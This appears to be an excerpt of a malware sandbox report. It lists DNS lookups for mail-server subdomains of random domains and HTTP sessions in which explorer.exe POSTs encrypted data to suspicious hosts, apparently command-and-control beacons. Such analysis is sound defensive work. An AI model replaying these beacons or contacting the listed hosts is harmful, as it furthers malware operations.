Nov 30, 2023 11:23:31.246517897 CET	1.1.1.1	192.168.2.4	0x802b	Name error (3)	pop.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.258995056 CET	1.1.1.1	192.168.2.4	0x54d0	Name error (3)	pop.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.265408993 CET	1.1.1.1	192.168.2.4	0x1137	Name error (3)	ssh.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.266335964 CET	1.1.1.1	192.168.2.4	0xd668	Name error (3)	nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.279586077 CET	1.1.1.1	192.168.2.4	0xe6a0	Name error (3)	mail.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.314661026 CET	1.1.1.1	192.168.2.4	0xed6	Name error (3)	imap.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.317719936 CET	1.1.1.1	192.168.2.4	0xfe08	Name error (3)	mail.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.318828106 CET	1.1.1.1	192.168.2.4	0x4215	Name error (3)	ssh.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.330595016 CET	1.1.1.1	192.168.2.4	0xefc8	Name error (3)	relay.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.343280077 CET	1.1.1.1	192.168.2.4	0x7dcb	Name error (3)	imap.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.343620062 CET	1.1.1.1	192.168.2.4	0x909f	Name error (3)	pop3.noweco.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.349464893 CET	1.1.1.1	192.168.2.4	0x93c4	Name error (3)	ftp.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.409871101 CET	1.1.1.1	192.168.2.4	0x3ed0	Name error (3)	imap.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.414499044 CET	1.1.1.1	192.168.2.4	0xd4ba	Name error (3)	relay.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.422153950 CET	1.1.1.1	192.168.2.4	0x909f	Name error (3)	pop3.noweco.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.452502966 CET	1.1.1.1	192.168.2.4	0x65c6	Name error (3)	ssh.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.454731941 CET	1.1.1.1	192.168.2.4	0x5149	Name error (3)	pop.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.481781960 CET	1.1.1.1	192.168.2.4	0xcba4	Name error (3)	centurylhrc.co	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:31.482124090 CET	1.1.1.1	192.168.2.4	0xae24	Name error (3)	nksegrawioint.an	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:31.488084078 CET	1.1.1.1	192.168.2.4	0xa787	Name error (3)	pop.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.497055054 CET	1.1.1.1	192.168.2.4	0xd4ba	Name error (3)	relay.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.507184029 CET	1.1.1.1	192.168.2.4	0x6dc9	Name error (3)	relay.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.555067062 CET	1.1.1.1	192.168.2.4	0x3e8d	Name error (3)	pop.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.556514978 CET	1.1.1.1	192.168.2.4	0xf77e	Name error (3)	nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.556907892 CET	1.1.1.1	192.168.2.4	0x87cc	Name error (3)	centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.590051889 CET	1.1.1.1	192.168.2.4	0xb752	Name error (3)	imap.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.595459938 CET	1.1.1.1	192.168.2.4	0x29b6	Name error (3)	pop3.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.630194902 CET	1.1.1.1	192.168.2.4	0x6f65	Name error (3)	imap.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.648199081 CET	1.1.1.1	192.168.2.4	0x8a73	Name error (3)	pop.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.653275967 CET	1.1.1.1	192.168.2.4	0xa923	Name error (3)	ftp.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.654553890 CET	1.1.1.1	192.168.2.4	0xf4b2	Name error (3)	mailgate.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.656038046 CET	1.1.1.1	192.168.2.4	0x7c19	Name error (3)	ssh.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.662162066 CET	1.1.1.1	192.168.2.4	0x8c68	Name error (3)	pop3.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.665101051 CET	1.1.1.1	192.168.2.4	0x8559	Name error (3)	mail.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.672636986 CET	1.1.1.1	192.168.2.4	0xf30d	Name error (3)	imap.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.679202080 CET	1.1.1.1	192.168.2.4	0x87a5	Name error (3)	mailgate.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.716104984 CET	1.1.1.1	192.168.2.4	0x4ccd	Name error (3)	pop.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.722543955 CET	1.1.1.1	192.168.2.4	0x838b	Name error (3)	pop3.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.728611946 CET	1.1.1.1	192.168.2.4	0x399c	Name error (3)	imap.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.734352112 CET	1.1.1.1	192.168.2.4	0x40d	Name error (3)	smtp.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.752763033 CET	1.1.1.1	192.168.2.4	0x3b1a	Name error (3)	imap.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.756012917 CET	1.1.1.1	192.168.2.4	0xb10f	Name error (3)	pop.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.761720896 CET	1.1.1.1	192.168.2.4	0xfe0c	Name error (3)	smtp.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.773332119 CET	1.1.1.1	192.168.2.4	0x424d	Name error (3)	pop3.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.803080082 CET	1.1.1.1	192.168.2.4	0x781f	Name error (3)	pop.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.803090096 CET	1.1.1.1	192.168.2.4	0x781f	Name error (3)	pop.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.804642916 CET	1.1.1.1	192.168.2.4	0x1ece	Name error (3)	imap.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.804738045 CET	1.1.1.1	192.168.2.4	0x1ece	Name error (3)	imap.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.806200981 CET	1.1.1.1	192.168.2.4	0xdaab	Name error (3)	mailgate.noweco.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.813353062 CET	1.1.1.1	192.168.2.4	0x260c	Name error (3)	ftp.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.828376055 CET	1.1.1.1	192.168.2.4	0x95e4	No error (0)	ftp.aqh.net		103.224.182.246	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.828413010 CET	1.1.1.1	192.168.2.4	0x95e4	No error (0)	ftp.aqh.net		103.224.182.246	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.828859091 CET	1.1.1.1	192.168.2.4	0xbc0a	Name error (3)	ftp.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.838041067 CET	1.1.1.1	192.168.2.4	0xd73e	Name error (3)	pop3.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.893727064 CET	1.1.1.1	192.168.2.4	0x70e6	Name error (3)	mailgate.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.921555042 CET	1.1.1.1	192.168.2.4	0x4ccd	Name error (3)	pop.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.925213099 CET	1.1.1.1	192.168.2.4	0x6886	Name error (3)	mail.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.926949978 CET	1.1.1.1	192.168.2.4	0x1f72	Name error (3)	ssh.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.927335978 CET	1.1.1.1	192.168.2.4	0xdaab	Name error (3)	mailgate.noweco.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.929482937 CET	1.1.1.1	192.168.2.4	0x5759	Name error (3)	mail.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.931896925 CET	1.1.1.1	192.168.2.4	0x694f	Name error (3)	smtp.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.933593988 CET	1.1.1.1	192.168.2.4	0xdc0b	Name error (3)	ssh.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.942121983 CET	1.1.1.1	192.168.2.4	0x70e6	Name error (3)	mailgate.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.970340014 CET	1.1.1.1	192.168.2.4	0x973b	Name error (3)	smtp.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.020354033 CET	1.1.1.1	192.168.2.4	0xdbae	Name error (3)	pop3.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.028151035 CET	1.1.1.1	192.168.2.4	0x2b78	Name error (3)	smtp.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.034076929 CET	1.1.1.1	192.168.2.4	0xd03e	Name error (3)	mailgate.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.050081015 CET	1.1.1.1	192.168.2.4	0xbbdc	Name error (3)	mailgate.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.051341057 CET	1.1.1.1	192.168.2.4	0x7e2e	Name error (3)	smtp.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.063978910 CET	1.1.1.1	192.168.2.4	0xc17f	Name error (3)	imap.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.065123081 CET	1.1.1.1	192.168.2.4	0x98fe	Name error (3)	mailgate.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.065604925 CET	1.1.1.1	192.168.2.4	0x468a	Name error (3)	relay.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.072652102 CET	1.1.1.1	192.168.2.4	0x65d7	Name error (3)	smtp.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.082979918 CET	1.1.1.1	192.168.2.4	0xb7bb	Name error (3)	pop3.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.093003035 CET	1.1.1.1	192.168.2.4	0x110f	Name error (3)	mailgate.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.127072096 CET	1.1.1.1	192.168.2.4	0x6c58	Name error (3)	pop.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.133064985 CET	1.1.1.1	192.168.2.4	0x276d	Name error (3)	pop.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.134453058 CET	1.1.1.1	192.168.2.4	0xf5b0	Name error (3)	smtp.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.137067080 CET	1.1.1.1	192.168.2.4	0x53b8	Name error (3)	relay.noweco.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.138252974 CET	1.1.1.1	192.168.2.4	0x67dc	Name error (3)	relay.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.141082048 CET	1.1.1.1	192.168.2.4	0xd87b	Name error (3)	pop.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.144633055 CET	1.1.1.1	192.168.2.4	0xea9c	Name error (3)	imap.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.146006107 CET	1.1.1.1	192.168.2.4	0x471	Name error (3)	imap.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.153332949 CET	1.1.1.1	192.168.2.4	0xf9ac	Name error (3)	smtp.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.157128096 CET	1.1.1.1	192.168.2.4	0x2769	Name error (3)	pop3.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.169974089 CET	1.1.1.1	192.168.2.4	0x2596	Name error (3)	mailgate.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.183188915 CET	1.1.1.1	192.168.2.4	0x1066	Name error (3)	smtp.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.186800957 CET	1.1.1.1	192.168.2.4	0x47e5	Name error (3)	smtp.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.187773943 CET	1.1.1.1	192.168.2.4	0x4719	Name error (3)	relay.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.203768969 CET	1.1.1.1	192.168.2.4	0xef06	Name error (3)	relay.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.241389990 CET	1.1.1.1	192.168.2.4	0xa51d	Name error (3)	smtp.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.241457939 CET	1.1.1.1	192.168.2.4	0xa51d	Name error (3)	smtp.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.268248081 CET	1.1.1.1	192.168.2.4	0xd31e	Name error (3)	relay.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.287266970 CET	1.1.1.1	192.168.2.4	0x2d80	Name error (3)	pop3.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.342752934 CET	1.1.1.1	192.168.2.4	0x2d80	Name error (3)	pop3.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.387942076 CET	1.1.1.1	192.168.2.4	0x69ed	Name error (3)	relay.8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.513767958 CET	1.1.1.1	192.168.2.4	0xc6f	Name error (3)	pop3.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.516422033 CET	1.1.1.1	192.168.2.4	0x48d	Name error (3)	pop3.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.519001961 CET	1.1.1.1	192.168.2.4	0x935c	Name error (3)	mailgate.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.576972008 CET	1.1.1.1	192.168.2.4	0x74c6	Name error (3)	mailgate.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.579284906 CET	1.1.1.1	192.168.2.4	0x1ead	Name error (3)	mailgate.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.596992016 CET	1.1.1.1	192.168.2.4	0x63cd	Name error (3)	pop3.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.650943041 CET	1.1.1.1	192.168.2.4	0xf9f4	Name error (3)	fyn.5idsevoeuliva0aafmail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:32.667016029 CET	1.1.1.1	192.168.2.4	0xd4d0	Name error (3)	relay.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.678641081 CET	1.1.1.1	192.168.2.4	0xf13e	Name error (3)	relay.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.685847044 CET	1.1.1.1	192.168.2.4	0x1f7a	Name error (3)	fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.703036070 CET	1.1.1.1	192.168.2.4	0x21ce	Name error (3)	relay.nc.usoxekeovca.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.722563982 CET	1.1.1.1	192.168.2.4	0x79f1	Name error (3)	relay.centurylhrc.co	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.728096008 CET	1.1.1.1	192.168.2.4	0x5d9c	Name error (3)	relay.nksegrawioint.an	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.741967916 CET	1.1.1.1	192.168.2.4	0x659c	Name error (3)	mailgate.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.741991997 CET	1.1.1.1	192.168.2.4	0x659c	Name error (3)	mailgate.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.850709915 CET	1.1.1.1	192.168.2.4	0xdf06	Name error (3)	ftp.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.883258104 CET	1.1.1.1	192.168.2.4	0xdd2f	Name error (3)	ssh.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.906450033 CET	1.1.1.1	192.168.2.4	0x75b9	Name error (3)	mail.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.060271025 CET	1.1.1.1	192.168.2.4	0x3c03	Name error (3)	m4242ail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:33.065213919 CET	1.1.1.1	192.168.2.4	0xa22d	Name error (3)	m4242ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.073182106 CET	1.1.1.1	192.168.2.4	0xb210	Name error (3)	imap.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.122818947 CET	1.1.1.1	192.168.2.4	0xf34c	Name error (3)	pop.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.129353046 CET	1.1.1.1	192.168.2.4	0x5b0c	Name error (3)	smtp.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.214375973 CET	1.1.1.1	192.168.2.4	0x2e83	Name error (3)	ftp.m4242ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.220006943 CET	1.1.1.1	192.168.2.4	0x70c1	Name error (3)	mail.m4242ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.224834919 CET	1.1.1.1	192.168.2.4	0xb17f	Name error (3)	mailgate.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.259426117 CET	1.1.1.1	192.168.2.4	0x7772	Name error (3)	pop3.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.337156057 CET	1.1.1.1	192.168.2.4	0x4ef4	Name error (3)	ssh.m4242ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.361047029 CET	1.1.1.1	192.168.2.4	0x7a4f	Name error (3)	pop.m4242ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.375027895 CET	1.1.1.1	192.168.2.4	0x40e7	Name error (3)	imap.m4242ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.391004086 CET	1.1.1.1	192.168.2.4	0xe77e	Name error (3)	relay.fyn.5idsevoeuliva0aafmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.405461073 CET	1.1.1.1	192.168.2.4	0xa33c	Name error (3)	smtp.m4242ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.537894964 CET	1.1.1.1	192.168.2.4	0xb223	Name error (3)	relay.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.537909031 CET	1.1.1.1	192.168.2.4	0xb223	Name error (3)	relay.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:35.020992041 CET	1.1.1.1	192.168.2.4	0x52ef	Server failure (2)	buuni8.cail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:35.021023035 CET	1.1.1.1	192.168.2.4	0x52ef	Server failure (2)	buuni8.cail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:35.021049023 CET	1.1.1.1	192.168.2.4	0x52ef	Server failure (2)	buuni8.cail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:35.021063089 CET	1.1.1.1	192.168.2.4	0x52ef	Server failure (2)	buuni8.cail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:35.237507105 CET	1.1.1.1	192.168.2.4	0x5271	Server failure (2)	buuni8.cail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:35.237529039 CET	1.1.1.1	192.168.2.4	0x5271	Server failure (2)	buuni8.cail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:35.237545013 CET	1.1.1.1	192.168.2.4	0x5271	Server failure (2)	buuni8.cail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:35.237559080 CET	1.1.1.1	192.168.2.4	0x5271	Server failure (2)	buuni8.cail.co.uk	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	34.94.245.237	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:19:29.086251974 CET	327	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rpkreoehjpwr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 218 Host: sumagulituyo.org
Nov 30, 2023 11:19:29.086277962 CET	272	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a8 c2 29 f9 Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bO){#Fx5kCu=C}eOW1iS!v~-C%+3j!ATP0>#'o`?)8606j!6
Nov 30, 2023 11:19:29.309087992 CET	472	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:19:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a7032c01d27bca2839101f03e960622b\|149.18.24.110\|1701339569\|1701339569\|0\|1\|0; path=/; domain=.sumagulituyo.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=149.18.24.110; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	104.198.2.251	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:19:30.100867033 CET	331	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://elgxmgpcrbbrhhq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: snukerukeutit.org
Nov 30, 2023 11:19:30.100936890 CET	214	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ae cb 36 f0 Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bO6ffu\E?o~jX'L*aK)X7 u1=y6S\|
Nov 30, 2023 11:19:30.322875023 CET	473	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:19:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=4b5d28b8f3e4f6dd52a90481fb19038d\|149.18.24.110\|1701339570\|1701339570\|0\|1\|0; path=/; domain=.snukerukeutit.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=149.18.24.110; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	34.143.166.163	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:19:32.243031979 CET	335	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fgtjeokaibdtmjph.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: lightseinsteniki.org
Nov 30, 2023 11:19:32.243031979 CET	353	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 86 a4 44 f2 Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bODu=!]Y^{f\&s~Vz'6gXa"D-cF@51If<:bvhlc'K}LT?8\|pL+;3!kE
Nov 30, 2023 11:19:32.806871891 CET	476	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:19:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=afcdc7abd36c95f5bc5b0bcbf2a6d852\|149.18.24.110\|1701339572\|1701339572\|0\|1\|0; path=/; domain=.lightseinsteniki.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=149.18.24.110; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	34.143.166.163	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
